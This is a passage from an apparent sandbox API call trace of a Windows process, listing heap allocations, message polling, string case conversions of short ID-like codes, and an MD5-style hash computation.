Size=0x8) returned 0x24b18e8 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0263.923] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0263.923] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.923] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.924] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.924] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.925] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.925] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.925] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.925] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.925] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.925] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.925] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.926] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.926] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.926] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.926] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.926] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.926] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.927] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.927] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.927] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.927] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.927] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.927] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.927] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0263.928] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0263.928] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.928] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.928] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.928] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.928] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.929] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0263.929] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.929] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0263.929] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.929] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0263.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0263.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.930] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.930] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.931] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.932] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0263.932] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0263.933] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0263.933] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.933] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.934] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.934] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.934] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0263.934] CryptHashData (hHash=0xaa5960, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0263.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0263.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 